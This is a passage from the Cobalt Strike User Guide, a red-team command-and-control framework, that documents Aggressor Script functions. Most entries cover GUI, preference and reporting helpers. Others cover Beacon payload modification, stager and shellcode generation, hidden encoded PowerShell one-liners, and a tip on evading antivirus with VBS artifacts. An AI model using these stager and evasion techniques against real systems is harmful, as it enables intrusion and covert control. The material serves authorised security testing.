+Arguments
+$1-BeaconDLLcontent
+$2-Startlocation
+Returns
+UpdatedDLLContent
+Example
+# ===========================================================================
+# $1 = Beacon DLL content
+# ===========================================================================
+sub demo_pe_stomp {
+local('$temp_dll, $offset, $value, $old_name');
+local('%pemap');
+local('@loc, @val');
+$temp_dll = $1;
+# -------------------------------------
+# Inspect the current DLL...
+# -------------------------------------
+%pemap = pedump($temp_dll);
+@loc = values(%pemap, @("Sections.AddressOfName.1."));
+@val = values(%pemap, @("Sections.AddressOfName.1."));
+if (size(@val) != 1) {
+warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
+} else {
+warn("Current Sections.AddressOfName.1 value: " . @val[0]);
+}
+CobaltStrikeUserGuide www.fortra.com page:413
+
+AggressorScript/Functions
+if (size(@loc) != 1) {
+warn("Unexpected size of Sections.AddressOfName.1 location array: " . size
+(@loc));
+} else {
+warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
+}
+# -------------------------------------
+# Set parameters (parse number as base 10)
+# -------------------------------------
+$location = parseNumber(@loc[0], 10);
+# -------------------------------------
+# pe_stomp (stomp a string at a location)
+# -------------------------------------
+# warn("pe_stomp(dll, " . $location . ")");
+$temp_dll = pe_stomp($temp_dll, $location);
+# -------------------------------------
+# Did it work?
+# -------------------------------------
+# dump_my_pe($temp_dll);
+# -------------------------------------
+# All Done! Give back edited DLL!
+# -------------------------------------
+return $temp_dll;
+}
+pe_update_checksum
+UpdatethechecksumintheBeaconDLLContent.
+Arguments
+$1-BeaconDLLcontent
+Returns
+UpdatedDLLContent
+Note
+Thisshouldbethelasttransformationperformed.
+CobaltStrikeUserGuide www.fortra.com page:414
+
+AggressorScript/Functions
+Example
+# -------------------------------------
+# update checksum
+# -------------------------------------
+$temp_dll = pe_update_checksum($temp_dll);
+pedump
+ParseanexecutableBeaconintoamapofthePEHeaderinformation.Theparsedinformation
+canbeusedforresearchorprogrammaticallytomakechangestotheBeacon.
+Arguments
+$1-BeaconDLLcontent
+Returns
+Amapoftheparsedinformation.Themapdataisverysimilartothe"./peclonedump[file]"
+commandoutput.
+Example
+# ===========================================================================
+# 'case insensitive sort' from sleep manual...
+# ===========================================================================
+sub caseInsensitiveCompare
+{
+$a = lc($1);
+$b = lc($2);
+return $a cmp $b;
+}
+# ===========================================================================
+# Dump PE Information
+# $1 = Beacon DLL content
+# ===========================================================================
+sub dump_my_pe {
+local('$out $key $val %pemap @sorted_keys');
+%pemap = pedump($1);
+# ---------------------------------------------------
+CobaltStrikeUserGuide www.fortra.com page:415
+
+AggressorScript/Functions
+# Example listing all items from hash/map...
+# ---------------------------------------------------
+@sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
+foreach $key (@sorted_keys)
+{
+$out = "$[50]key";
+foreach $val (values(%pemap, @($key)))
+{
+$out .= " $val";
+println($out);
+}
+}
+# ---------------------------------------------------
+# Example of grabbing specific items from hash/map...
+# ---------------------------------------------------
+local('@loc_cs @val_cs');
+@loc_cs = values(%pemap, @("CheckSum."));
+@val_cs = values(%pemap, @("CheckSum."));
+println("");
+println("My DLL CheckSum Location: " . @loc_cs);
+println("My DLL CheckSum Value: " . @val_cs);
+println("");
+}
+Seealso
+./peclonedump[file]
+pgraph
+GeneratethepivotgraphGUIcomponent.
+Returns
+ThepivotgraphGUIobject(ajavax.swing.JComponent)
+Example
+addVisualization("Pivot Graph", pgraph());
+Seealso
+CobaltStrikeUserGuide www.fortra.com page:416
+
+AggressorScript/Functions
+&showVisualization
+pivots
+ReturnsalistofSOCKSpivotsfromCobaltStrike'sdatamodel.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachpivot.
+Example
+printAll(pivots());
+popup_clear
+Removeallpopupmenusassociatedwiththecurrentmenu.ThisisawaytooverrideCobalt
+Strike'sdefaultpopupmenudefinitions.
+Arguments
+$1-thepopuphooktoclearregisteredmenusfor
+Example
+popup_clear("help");
+popup help {
+item "My stuff!" {
+show_message("This is my menu!");
+}
+}
+powershell
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and
+&powershell_command instead.
+ReturnsaPowerShellone-linertobootstrapthespecifiedlistener.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:417
+
+AggressorScript/Functions
+$1-thelistenername
+$2-[true/false]:isthislistenertargetinglocalhost?
+$3-x86|x64-thearchitectureofthegeneratedstager.
+Notes
+Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
+Returns
+APowerShellone-linertorunthespecifiedlistener.
+Example
+println(powershell("my listener", false));
+powershell_command
+Returnsaone-linertorunaPowerShellexpression(e.g.,powershell.exe -nop -w
+hidden -encodedcommand MgAgACsAIAAyAA==)
+Arguments
+$1-thePowerShellexpressiontowrapintoaone-liner.
+$2-willthePowerShellcommandrunonaremotetarget?
+Returns
+Returnsapowershell.exeone-linertorunthespecifiedexpression.
+Example
+$cmd = powershell_command("2 + 2", false);
+println($cmd);
+powershell_compress
+CompressesaPowerShellscriptandwrapsitinascripttodecompressandexecuteit.
+CobaltStrikeUserGuide www.fortra.com page:418
+
+AggressorScript/Functions
+Arguments
+$1-thePowerShellscripttocompress.
+Example
+$script = powershell_compress("2 + 2");
+powershell_encode_oneliner
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command
+instead.
+Returnsaone-linertorunaPowerShellexpression(e.g.,powershell.exe -nop -w
+hidden -encodedcommand MgAgACsAIAAyAA==)
+Arguments
+$1-thePowerShellexpressiontowrapintoaone-liner.
+Returnsapowershell.exeone-linertorunthespecifiedexpression.
+Example
+$cmd = powershell_encode_oneliner("2 + 2");
+println($cmd);
+powershell_encode_stager
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and
+&powershell_command instead.
+Returnsabase64encodedPowerShellscripttorunthespecifiedshellcode
+Arguments
+$1-shellcodetowrap
+Returns
+Returnsabase64encodedPowerShellsuitableforusewithpowershell.exe's-encoption.
+CobaltStrikeUserGuide www.fortra.com page:419
+
+AggressorScript/Functions
+Example
+$shellcode = shellcode("my listener", false);
+$readytouse = powershell_encode_stager($shellcode);
+println("powershell.exe -ep bypass -enc $readytouse");
+pref_get
+GrabsastringvaluefromCobaltStrike'spreferences.
+Arguments
+$1-thepreferencename
+$2-thedefaultvalue[ifthereisnovalueforthispreference]
+Returns
+Astringwiththepreferencevalue.
+Example
+$foo = pref_get("foo.string", "bar");
+pref_get_list
+GrabsalistvaluefromCobaltStrike'spreferences.
+Arguments
+$1-thepreferencename
+Returns
+Anarraywiththepreferencevalues
+Example
+@foo = pref_get_list("foo.list");
+CobaltStrikeUserGuide www.fortra.com page:420
+
+AggressorScript/Functions
+pref_set
+SetavalueinCobaltStrike'spreferences
+Arguments
+$1-thepreferencename
+$2-thepreferencevalue
+Example
+pref_set("foo.string", "baz!");
+pref_set_list
+StoresalistvalueintoCobaltStrike'spreferences.
+Arguments
+$1-thepreferencename
+$2-anarrayofvaluesforthispreference
+Example
+pref_set_list("foo.list", @("a", "b", "c"));
+previousTab
+Activatethetabthatistotheleftofthecurrenttab.
+Example
+bind Ctrl+Left {
+previousTab();
+}
+process_browser
+CobaltStrikeUserGuide www.fortra.com page:421
+
+AggressorScript/Functions
+OpenstheProcessBrowser.Thisfunctiondoesnothaveanyparameters.
+privmsg
+Postaprivatemessagetoauserintheeventlog
+Arguments
+$1-whotosendthemessageto
+$2-themessage
+Example
+privmsg("raffi", "what's up man?");
+prompt_confirm
+ShowadialogwithYes/Nobuttons.Iftheuserpressesyes,callthespecifiedfunction.
+Arguments
+$1-textinthedialog
+$2-titleofthedialog
+$3-acallbackfunction.Calledwhentheuserpressesyes.
+Example
+prompt_confirm("Do you feel lucky?", "Do you?", {
+show_mesage("Ok, I got nothing");
+});
+prompt_directory_open
+Showadirectoryopendialog.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:422
+
+AggressorScript/Functions
+$1-titleofthedialog
+$2-defaultvalue
+$3-true/false:allowusertoselectmultiplefolders?
+$4-acallbackfunction.Calledwhentheuserchoosesafolder.Theargumenttothecallbackis
+theselectedfolder.Ifmultiplefoldersareselected,theywillstillbespecifiedasthefirst
+argument,separatedbycommas.
+Example
+prompt_directory_open("Choose a folder", $null, false, {
+show_message("You chose: $1");
+});
+prompt_file_open
+Showafileopendialog.
+Arguments
+$1-titleofthedialog
+$2-defaultvalue
+$3-true/false:allowusertoselectmultiplefiles?
+$4-acallbackfunction.Calledwhentheuserchoosesafiletoopen.Theargumenttothe
+callbackistheselectedfile.Ifmultiplefilesareselected,theywillstillbespecifiedasthefirst
+argument,separatedbycommas.
+Example
+prompt_file_open("Choose a file", $null, false, {
+show_message("You chose: $1");
+});
+prompt_file_save
+Showafilesavedialog.
+CobaltStrikeUserGuide www.fortra.com page:423
+
+AggressorScript/Functions
+Arguments
+$1-defaultvalue
+$2-acallbackfunction.Calledwhentheuserchoosesafilename.Theargumenttothecallback
+isthedesiredfile.
+Example
+prompt_file_save($null, {
+local('$handle');
+$handle = openf("> $+ $1");
+println($handle, "I am content");
+closef($handle);
+});
+prompt_text
+Showadialogthataskstheuserfortext.
+Arguments
+$1-textinthedialog
+$2-defaultvalueinthetextfield.
+$3-acallbackfunction.CalledwhentheuserpressesOK.Thefirstargumenttothiscallbackis
+thetexttheuserprovided.
+Example
+prompt_text("What is your name?", "Cyber Bob", {
+show_mesage("Hi $1 $+ , nice to meet you!");
+});
+range
+Generateanarrayofnumbersbasedonastringdescriptionofranges.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:424
+
+AggressorScript/Functions
+$1-astringwithadescriptionofranges
+Range Result
+103 Thenumber103
+3-8 Thenumbers3,4,5,6,and7.
+2,4-6 Thenumbers2,4,and5.
+Returns
+Anarrayofnumberswithinthespecifiedranges.
+Example
+printAll(range("2,4-6"));
+redactobject
+Removesapost-exploitationobject(e.g.,screenshot,keystrokebuffer)fromtheuserinterface.
+Arguments
+$1-theIDofthepost-exploitationobject.
+removeTab
+Closetheactivetab
+Example
+bind Ctrl+D {
+removeTab();
+}
+resetData
+ResetCobaltStrike'sdatamodel.
+say
+CobaltStrikeUserGuide www.fortra.com page:425
+
+AggressorScript/Functions
+Postapublicchatmessagetotheeventlog.
+Arguments
+$1-themessage
+Example
+say("Hello World!");
+sbrowser
+GeneratethesessionbrowserGUIcomponent.ShowsBeaconANDSSHsessions.
+Returns
+ThesessionbrowserGUIobject(ajavax.swing.JComponent)
+Example
+addVisualization("Session Browser", sbrowser());
+Seealso
+&showVisualization
+screenshots
+ReturnsalistofscreenshotsfromCobaltStrike'sdatamodel.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachscreenshot.
+Example
+printAll(screenshots());
+script_resource
+CobaltStrikeUserGuide www.fortra.com page:426
+
+AggressorScript/Functions
+Returnsthefullpathtoaresourcethatisstoredrelativetothisscriptfile.
+Arguments
+$1-thefiletogetapathfor
+Returns
+Thefullpathtothespecifiedfile.
+Example
+println(script_resource("dummy.txt"));
+separator
+Insertaseparatorintothecurrentmenutree.
+Example
+popup foo {
+item "Stuff" { ... }
+separator();
+item "Other Stuff" { ... }
+}
+services
+ReturnsalistofservicesinCobaltStrike'sdatamodel.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachservice.
+Example
+printAll(services());
+setup_reflective_loader
+CobaltStrikeUserGuide www.fortra.com page:427
+
+AggressorScript/Functions
+Insertthereflectiveloaderexecutablecodeintoabeaconpayload.
+Arguments
+$1-Originalbeaconexecutablepayload.
+$2-UserdefinedReflectiveLoaderexecutabledata.
+Returns
+Thebeaconexecutablepayloadupdatedwiththeuserdefinedreflectiveloader.$nullifthereis
+anerror.
+Notes
+TheuserdefinedReflectiveLoadermustbelessthan5k.
+Example
+SeeBEACON_RDLL_GENERATEhook
+# ---------------------------------------------------------------------
+# Replace the beacons default loader with '$loader'.
+# ---------------------------------------------------------------------
+$temp_dll = setup_reflective_loader($2, $loader);
+setup_strings
+ApplythestringsdefinedintheMalleableC2profiletothebeaconpayload.
+Arguments
+$1–beaconpayloadtomodify
+Returns
+Theupdatedbeaconpayloadwiththedefinedstringsappliedtothepayload.
+Example
+SeeBEACON_RDLL_GENERATEhook
+CobaltStrikeUserGuide www.fortra.com page:428
+
+AggressorScript/Functions
+# Apply strings to the beacon payload.
+$temp_dll = setup_strings($temp_dll);
+setup_transformations
+ApplythetransformationsrulesdefinedintheMalleableC2profiletothebeaconpayload.
+Arguments
+$1–Beaconpayloadtomodify
+$2–Beaconarchitecture(x86/x64)
+Returns
+Theupdatedbeaconpayloadwiththetransformationsappliedtothepayload.
+Example
+SeeBEACON_RDLL_GENERATEhook
+# Apply the transformations to the beacon payload.
+$temp_dll = setup_transformations($temp_dll, $arch);
+shellcode
+DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.
+ReturnsrawshellcodeforaspecificCobaltStrikelistener
+Arguments
+$1-thelistenername
+$2-true/false:isthisshellcodedestinedforaremotetarget?
+$3-x86|x64-thearchitectureofthestageroutput.
+Note
+Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
+CobaltStrikeUserGuide www.fortra.com page:429
+
+AggressorScript/Functions
+Returns
+Ascalarcontainingshellcodeforthespecifiedlistener.
+Example
+$data = shellcode("my listener", false, "x86");
+$handle = openf(">out.bin");
+writeb($handle, $data);
+closef($handle);
+showVisualization
+SwitchCobaltStrikevisualizationtoaregisteredvisualization.
+Arguments
+$1-thenameofthevisualization
+Example
+bind Ctrl+H {
+showVisualization("Hello World");
+}
+Seealso
+&showVisualization
+show_error
+Showsanerrormessagetotheuserinadialogbox.Usethisfunctiontorelayerrorinformation.
+Arguments
+$1-themessagetext
+Example
+CobaltStrikeUserGuide www.fortra.com page:430
+
+AggressorScript/Functions
+show_error("You did something bad.");
+show_message
+Showsamessagetotheuserinadialogbox.Usethisfunctiontorelayinformation.
+Arguments
+$1-themessagetext
+Example
+show_message("You've won a free ringtone");
+site_host
+HostcontentonCobaltStrike'swebserver
+Arguments
+$1-thehostforthissite(&localipisagooddefault)
+$2-theport(e.g.,80)
+$3-theURI(e.g.,/foo)
+$4-thecontenttohost(asastring)
+$5-themime-type(e.g.,"text/plain")
+$6-adescriptionofthecontent.ShowninSite Management -> Manage.
+$7-useSSLornot(trueorfalse)
+Returns
+TheURLtothishostedsite
+Example
+site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World
+Page", false);
+CobaltStrikeUserGuide www.fortra.com page:431
+
+AggressorScript/Functions
+site_kill
+RemoveasitefromCobaltStrike'swebserver
+Arguments
+$1-theport
+$2-theURI
+Example
+# removes the content bound to / on port 80
+site_kill(80, "/");
+sites
+ReturnsalistofsitestiedtoCobaltStrike'swebserver.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachregisteredsite.
+Example
+printAll(sites());
+ssh_command_describe
+DescribeanSSHcommand.
+Returns
+AstringdescriptionoftheSSHcommand.
+Arguments
+$1-thecommand
+Example
+CobaltStrikeUserGuide www.fortra.com page:432
+
+AggressorScript/Functions
+println(ssh_command_describe("sudo"));
+ssh_command_detail
+GetthehelpinformationforanSSHcommand.
+Returns
+AstringwithhelpfulinformationaboutanSSHcommand.
+Arguments
+$1-thecommand
+Example
+println(ssh_command_detail("sudo"));
+ssh_command_register
+RegisterhelpinformationforanSSHconsolecommand.
+Arguments
+$1-thecommand
+$2-theshortdescriptionofthecommand
+$3-thelong-formhelpforthecommand.
+Example
+ssh_alias echo {
+blog($1, "You typed: " . substr($1, 5));
+}
+ssh_command_register(
+"echo",
+"echo posts to the current session's log",
+"Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
+CobaltStrikeUserGuide www.fortra.com page:433
+
+AggressorScript/Functions
+ssh_commands
+GetalistofSSHcommands.
+Returns
+AnarrayofSSHcommands.
+Example
+printAll(ssh_commands());
+stager
+ReturnsthestagerforaspecificCobaltStrikelistener
+Arguments
+$1-thelistenername
+$2-x86|x64-thearchitectureofthestageroutput.
+Note
+Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
+Returns
+Ascalarcontainingshellcodeforthespecifiedlistener.
+Example
+$data = stager("my listener", "x86");
+$handle = openf(">out.bin");
+writeb($handle, $data);
+closef($handle);
+stager_bind_pipe
+CobaltStrikeUserGuide www.fortra.com page:434
+
+AggressorScript/Functions
+Returnsabind_pipestagerforaspecificCobaltStrikelistener.Thisstagerissuitableforusein
+lateralmovementactionsthatbenefitfromasmallnamedpipestager.Stagewith&beacon_
+stage_pipe.
+Arguments
+$1-thelistenername
+Returns
+Ascalarcontainingx86bind_pipeshellcode.
+Example
+# step 1. generate our stager
+$stager = stager_bind_pipe("my listener");
+# step 2. do something to run our stager
+# step 3. stage a payload via this stager
+beacon_stage_pipe($bid, $target, "my listener", "x86");
+# step 4. assume control of the payload (if needed)
+beacon_link($bid, $target, "my listener");
+Seealso
+&artifact_general
+stager_bind_tcp
+Returnsabind_tcpstagerforaspecificCobaltStrikelistener.Thisstagerissuitableforusein
+localhost-onlyactionsthatrequireasmallstager.Stagewith&beacon_stage_tcp.
+Arguments
+$1-thelistenername
+$2-x86|x64-thearchitectureofthestageroutput.
+$3-theporttobindto
+CobaltStrikeUserGuide www.fortra.com page:435
+
+AggressorScript/Functions
+Returns
+Ascalarcontainingbind_tcpshellcode
+Example
+# step 1. generate our stager
+$stager = stager_bind_tcp("my listener", "x86", 1234);
+# step 2. do something to run our stager
+# step 3. stage a payload via this stager
+beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
+# step 4. assume control of the payload (if needed)
+beacon_link($bid, $target, "my listener");
+Seealso
+&artifact_general
+str_chunk
+Chunkastringintomultipleparts
+Arguments
+$1-thestringtochunk
+$2-themaximumsizeofeachchunk
+Returns
+Theoriginalstringsplitintomultiplechunks
+Example
+# hint... :)
+else if ($1 eq "template.x86.ps1") {
+local('$enc');
+$enc = str_chunk(base64_encode($2), 61);
+CobaltStrikeUserGuide www.fortra.com page:436
+
+AggressorScript/Functions
+return strrep($data, '%%DATA%%', join("' + '", $enc));
+}
+str_decode
+Convertastringofbytestotextwiththespecifiedencoding.
+Arguments
+$1-thestringtodecode
+$2-theencodingtouse.
+Returns
+Thedecodedtext.
+Example
+# convert back to a string we can use (from UTF16-LE)
+$text = str_decode($string, "UTF16-LE");
+str_encode
+Converttexttobytestringwiththespecifiedcharacterencoding.
+Arguments
+$1-thestringtoencode
+$2-theencodingtouse
+Returns
+Theresultingstring.
+Example
+# convert to UTF16-LE
+$encoded = str_encode("this is some text", "UTF16-LE");
+CobaltStrikeUserGuide www.fortra.com page:437
+
+AggressorScript/Functions
+str_xor
+WalkastringandXOR itwiththeprovidedkey.
+Arguments
+$1-thestringtomask
+$2-thekeytouse(string)
+Returns
+Theoriginalstringmaskedwiththespecifiedkey.
+Example
+$mask = str_xor("This is a string", "key");
+$plain = str_xor($mask, "key");
+sync_download
+Syncadownloadedfile(View->Downloads)toalocalpath.
+Arguments
+$1-theremotepathtothefiletosync.See&downloads
+$2-wheretosavethefilelocally
+$3-(optional)acallbackfunctiontoexecutewhendownloadissynced.Thefirstargumentto
+thisfunctionisthelocalpathofthedownloadedfile.
+Example
+# sync all downloads
+command ga {
+local('$download $lpath $name $count');
+foreach $count => $download (downloads()) {
+($lpath, $name) = values($download, @("lpath", "name"));
+sync_download($lpath, script_resource("file $+ .$count"), lambda({
+println("Downloaded $1 [ $+ $name $+ ]");
+CobaltStrikeUserGuide www.fortra.com page:438
+
+AggressorScript/Functions
+}, \$name));
+}
+}
+targets
+ReturnsalistofhostinformationinCobaltStrike'sdatamodel.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachhost.
+Example
+printAll(targets());
+tbrowser
+GeneratethetargetbrowserGUIcomponent.
+Returns
+ThetargetbrowserGUIobject(ajavax.swing.JComponent)
+Example
+addVisualization("Target Browser", tbrowser());
+Seealso
+&showVisualization
+tokenToEmail
+Covertaphishingtokentoanemailaddress.
+Arguments
+$1-thephishingtoken
+CobaltStrikeUserGuide www.fortra.com page:439
+
+AggressorScript/Functions
+Returns
+Theemailaddressor"unknown"ifthetokenisnotassociatedwithanemail.
+Example
+set PROFILER_HIT {
+local('$out $app $ver $email');
+$email = tokenToEmail($5);
+$out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
+foreach $app => $ver ($4) {
+$out .= "\n\t $+ $[25]app $ver";
+}
+return "$out $+ \n\n";
+}
+transform
+Transformshellcodeintoanotherformat.
+Arguments
+$1-theshellcodetotransform
+$2-thetransformtoapply
+Type Description
+array commaseparatedbytevalues
+hex Hex-encodethevalue
+powershell-base64 PowerShell.exe-friendlybase64encoder
+vba aVBAarray()withnewlinesaddedin
+vbs aVBSexpressionthatresultsinastring
+veil Veil-readystring(\x##\x##)
+Returns
+Theshellcodeafterthespecifiedtransformisapplied
+Example
+CobaltStrikeUserGuide www.fortra.com page:440
+
+AggressorScript/Functions
+println(transform("This is a test!", "veil"));
+transform_vbs
+TransformshellcodeintoaVBSexpressionthatresultsinastring
+Arguments
+$1-theshellcodetotransform
+$2-themaximumlengthofaplaintextrun
+Notes
+l
+Previously,CobaltStrikewouldembeditsstagersintoVBSfilesasseveralChr()calls
+concatenatedintoastring.
+l CobaltStrike3.9introducedfeaturesthatrequiredlargerstagers.Theselargerstagers
+weretoobigtoembedintoaVBSfilewiththeabovemethod.
+l
+TogetpastthisVBSlimitation,CobaltStrikeoptedtouseChr()callsfornon-ASCII
+dataandrunsofdouble-quotedstringsforprintablecharacters.
+l Thischange,anengineeringnecessity,unintentionallydefeatedstaticanti-virus
+signaturesforCobaltStrike'sdefaultVBSartifactsatthattime.
+l Ifyou'relookingforaneasyevasionbenefitwithVBSartifacts,consideradjustingthe
+plaintextrunlengthinyourResourceKit.
+Returns
+Theshellcodeafterthistransformisapplied
+Example
+println(transform_vbs("This is a test!", "3"));
+tstamp
+Formatatimeintoadate/timevalue.Thisvaluedoesnotincludeseconds.
+Arguments
+$1-thetime[millisecondssincetheUNIXepoch]
+CobaltStrikeUserGuide www.fortra.com page:441
+
+AggressorScript/Functions
+Example
+println("The time is now: " . tstamp(ticks()));
+Seealso
+&dstamp
+unbind
+Removeakeyboardshortcutbinding.
+Arguments
+$1-thekeyboardshortcut
+Example
+# restore default behavior of Ctrl+Left and Ctrl+Right
+unbind("Ctrl+Left");
+unbind("Ctrl+Right");
+Seealso
+&bind
+url_open
+OpenaURLinthedefaultbrowser.
+Arguments
+$1-theURLtoopen
+Example
+CobaltStrikeUserGuide www.fortra.com page:442
+
+AggressorScript/Functions
+command go {
+url_open("https://www.cobaltstrike.com/");
+}
+users
+Returnsalistofusersconnectedtothisteamserver.
+Returns
+Anarrayofusers.
+Example
+foreach $user (users()) {
+println($user);
+}
+vpn_interface_info
+GetinformationaboutaVPNinterface.
+Arguments
+$1-theinterfacename
+$2-[Optional]thekeytoextractavaluefor
+Returns
+%info = vpn_interface_info("interface");
+Returnsadictionarywiththemetadataforthisinterface.
+$value = vpn_interface_info("interface", "key");
+Returnsthevalueforthespecifiedkeyfromthisinterface'smetadata
+Example
+CobaltStrikeUserGuide www.fortra.com page:443
+
+AggressorScript/Functions
+# create a script console alias to interface info
+command interface {
+println("Interface $1");
+foreach $key => $value (vpn_interface_info($1)) {
+println("$[15]key $value");
+}
+}
+vpn_interfaces
+ReturnalistofVPNinterfacenames
+Returns
+Anarrayofinterfacenames.
+Example
+printAll(vpn_interfaces());
+vpn_tap_create
+CreateaCovertVPNinterfaceontheteamserversystem.
+Arguments
+$1-theinterfacename(e.g.,phear0)
+$2-theMACaddress($nullwillmakearandomMACaddress)
+$3-reserved;use$nullfornow.
+$4-theporttobindtheVPN'schannelto
+$5-thetypeofchannel[bind,http,icmp,reverse,udp]
+Example
+vpn_tap_create("phear0", $null, $null, 7324, "udp");
+vpn_tap_delete
+CobaltStrikeUserGuide www.fortra.com page:444
+
+AggressorScript/PopupHooks
+DestroyaCovertVPNinterface
+Arguments
+$1-theinterfacename(e.g.,phear0)
+Example
+vpn_tap_destroy("phear0");
+Popup Hooks
+ThefollowingpopuphooksareavailableinCobaltStrike:
+Hook Where Arguments
+aggressor Cobalt StrikeMenu
+attacks AttacksMenu
+beacon [session] $1=selectedbeaconIDs(array)
+beacon_top [session] $1=selectedbeaconIDs(array)
+beacon_bottom [session] $1=selectedbeaconIDs(array)
+credentials CredentialBrowser $1=selectedcredentialrows(arrayof
+hashes)
+filebrowser [fileinfilebrowser] $1=beaconID,$2=folder,$3=selected
+files(array)
+help HelpMenu
+listeners Listenerstable $1=selectedlistenernames(array)
+pgraph [pivotgraph]
+processbrowser ProcessBrowser $1=BeaconID,$2=selectedprocesses
+(array)
+processbrowser_ Multi-SessionProcess $1=selectedprocesses(array)
+multi Browser
+reporting ReportingMenu
+ssh [SSHsession] $1=selectedsessionIDs(array)
+CobaltStrikeUserGuide www.fortra.com page:445
+
+AggressorScript/Report-OnlyFunctions
+Hook Where Arguments
+targets [host] $1=selectedhosts(array)
+targets_other [host] $1=selectedhosts(array)
+view ViewMenu
+Report-Only Functions
+ThesefunctionsapplytoCobaltStrike'scustomreportcapabilityonly.
+agApplications
+Pullinformationfromtheapplicationsmodel.
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryintheapplicationsmodel.
+Example
+printAll(agApplications($model));
+agC2info
+Pullinformationfromthec2infomodel.
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryinthec2infomodel.
+CobaltStrikeUserGuide www.fortra.com page:446
+
+AggressorScript/Report-OnlyFunctions
+Example
+printAll(agC2Info($model));
+agCredentials
+Pullinformationfromthecredentialsmodel
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryinthecredentialsmodel.
+Example
+printAll(agCredentials($model));
+agServices
+Pullinformationfromtheservicesmodel
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryintheservicesmodel.
+Example
+printAll(agServices($model));
+agSessions
+Pullinformationfromthesessionsmodel
+CobaltStrikeUserGuide www.fortra.com page:447
+
+AggressorScript/Report-OnlyFunctions
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryinthesessionsmodel.
+Example
+printAll(agSessions($model));
+agTargets
+Pullinformationfromthetargetsmodel.
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryinthetargetsmodel.
+Example
+printAll(agTargets($model));
+agTokens
+Pullinformationfromthephishingtokensmodel.
+Arguments
+$1-themodeltopullthisinformationfrom.
+Returns
+Anarrayofdictionaryobjectsthatdescribeseachentryinthephishingtokensmodel.
+CobaltStrikeUserGuide www.fortra.com page:448
+
+AggressorScript/Report-OnlyFunctions
+Example
+printAll(agTokens($model));
+attack_describe
+MapsaMITREATT&CKtacticIDtoitslongerdescription.
+Returns
+Thefulldescriptionofthetactic
+Example
+println(attack_describe("T1134"));
+attack_detect
+MapsaMITREATT&CKtacticIDtoitsdetectionstrategy
+Returns
+Thedetectionstrategyforthistactic.
+Example
+println(attack_detect("T1134"));
+attack_mitigate
+MapsaMITREATT&CKtacticIDtoitsmitigationstrategy
+Returns
+Themitigationstrategyforthistactic.
+Example
+println(attack_mitigate("T1134"));
+CobaltStrikeUserGuide www.fortra.com page:449
+
+AggressorScript/Report-OnlyFunctions
+attack_name
+MapsaMITREATT&CKtacticIDtoitsshortname.
+Returns
+Thenameorshortdescriptionofthetactic.
+Example
+println(attack_name("T1134"));
+attack_tactics
+AnarrayofMITREATT&CKtacticsknowntoCobaltStrike.
+https://attack.mitre.org
+Returns
+AnarrayoftacticIDs(e.g.,T1001,T1002,etc.).
+Example
+printAll(attack_tactics());
+attack_url
+MapsaMITREATT&CKtacticIDtotheURLwhereyoucanlearnmore.
+Returns
+TheURLassociatedwiththistactic.
+Example
+println(attack_url("T1134"));
+bookmark
+CobaltStrikeUserGuide www.fortra.com page:450
+
+AggressorScript/Report-OnlyFunctions
+Defineabookmark[PDFdocumentonly]
+Arguments
+$1-Thebookmarktodefine[mustbethesameas&h1or&h2title].
+$2-(Optional)Defineachildbookmark[mustbethesameas&h1or&h2title].
+Example
+# build out a document structure
+h1("First");
+h2("Child #1");
+h2("Child #2");
+# define bookmarks for it
+bookmark("First");
+bookmark("First", "Child #1");
+bookmark("First", "Child #2");
+br
+Printaline-break.
+Example
+br();
+describe
+Setadescriptionforareport.
+Arguments
+$1-Thereporttosetadefaultdescriptionfor.
+$2-Thedefaultdescription
+Example
+CobaltStrikeUserGuide www.fortra.com page:451
+
+AggressorScript/Report-OnlyFunctions
+describe("Foo Report", "This report is about my foo");
+report "Foo Report" {
+# yada yada yada...
+}
+h1
+Printsatitleheading.
+Arguments
+$1-theheadingtoprint.
+Example
+h1("I am the title");
+h2
+Printsasub-titleheading.
+Arguments
+$1-thetexttoprint.
+Example
+h2("I am the sub-title");
+h3
+Printsasub-sub-titleheading.
+Arguments
+$1-thetexttoprint.
+Example
+CobaltStrikeUserGuide www.fortra.com page:452
+
+AggressorScript/Report-OnlyFunctions
+h3("I am not important.");
+h4
+Printsasub-sub-sub-titleheading.
+Arguments
+$1-thetexttoprint.
+Example
+h4("I am really not important.");
+kvtable
+Printsatablewithkey/valuepairs.
+Arguments
+$1-adictionarywithkey/valuepairstoprint.
+Example
+# use an ordered-hash to preserve order
+$table = ohash();
+$table["#1"] = "first";
+$table["#2"] = "second";
+$table["#3"] = "third";
+kvtable($table);
+landscape
+Changestheorientationofthisdocumenttolandscape.
+Example
+landscape();
